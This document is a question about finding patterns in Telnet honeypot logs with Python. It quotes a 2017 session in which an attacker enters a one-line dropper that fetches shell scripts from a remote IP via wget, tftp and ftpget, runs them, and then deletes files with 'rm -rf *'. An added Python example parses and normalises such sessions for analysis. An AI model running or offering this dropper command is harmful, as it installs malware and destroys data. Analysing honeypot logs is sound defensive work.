[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:08]: New Telnet session established!

[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:42]: rsh
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.25/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.25 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.25; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.25 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: ./ebs
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>HP_Exec: /sbin/lsmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>HP_Error: -22
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:57]: Session end!

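I have thousands of log files like this, and I want to identify the patterns in them, since most of the commands used are the same across all the log files. Please let me know how to proceed, or which method to use in Python?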
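
One way to approach the question above, as an added example that is not part of the original post: parse each line of this log format, group messages by source IP and session ID, and replace URLs, IP addresses and script names with placeholders so that identical command shapes count together. The function names are hypothetical, the second sample session (documentation-range addresses) is constructed, and session IDs are assumed unique per source IP.

```python
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r"\[IPv4:\s*(?P<ip>[\d.]+):\d+\s*\]"
                     r"\[Session ID: (?P<sid>\d+)\]\[[^\]]+\]: (?P<msg>.*)")
URL_RE = re.compile(r"\w+://\S+")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
FILE_RE = re.compile(r"\b[\w.-]+\.sh\b")

def parse(lines):
    """Group log messages by (source IP, session ID); add the file name to the key if IDs repeat."""
    sessions = defaultdict(list)
    for m in filter(None, map(LINE_RE.match, lines)):
        sessions[m["ip"], m["sid"]].append(m["msg"].strip())
    return sessions

def normalize(cmd):
    """Replace per-campaign values so identical command shapes compare equal."""
    for rx, tag in ((URL_RE, "<URL>"), (IP_RE, "<IP>"), (FILE_RE, "<FILE>")):
        cmd = rx.sub(tag, cmd)
    return cmd.strip()

def templates(msgs):
    """Normalized sub-commands from the typed input (split on ';' and '||')."""
    typed = [m for m in msgs if not m.startswith((">>", "New Telnet", "Session end"))]
    return [normalize(p) for m in typed for p in re.split(r";|\|\|", m) if p.strip()]

def executed(msgs):
    """Ordered tuple of binaries the honeypot reports as executed."""
    return tuple(m.split(": ", 1)[1] for m in msgs if m.startswith(">>Executing: "))

def summarize(lines):
    """Count command templates and per-session execution sequences."""
    cmd_counts, seq_counts = Counter(), Counter()
    for msgs in parse(lines).values():
        cmd_counts.update(templates(msgs))
        seq_counts[executed(msgs)] += 1
    return cmd_counts, seq_counts

# Session 2 is shortened from the log above; session 3 is constructed for the example.
SAMPLE = """\
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: cd /tmp || cd /; wget http://185.165.29.25/heckz.sh; chmod 777 heckz.sh; sh heckz.sh
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/chmod
[IPv4:   192.0.2.7:40001 ][Session ID: 3][2017-07-26 09:00:00]: cd /tmp || cd /; wget http://198.51.100.9/a.sh; chmod 777 a.sh; sh a.sh
[IPv4:   192.0.2.7:40001 ][Session ID: 3][2017-07-26 09:00:01]: >>Executing: /usr/bin/wget
[IPv4:   192.0.2.7:40001 ][Session ID: 3][2017-07-26 09:00:02]: >>Executing: /bin/chmod
""".splitlines()
print(summarize(SAMPLE)[0].most_common(3))
```

For many files, pass each file's lines to `summarize` and add the returned counters together; sessions whose templates or execution sequence are rare are the ones worth reading by hand.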
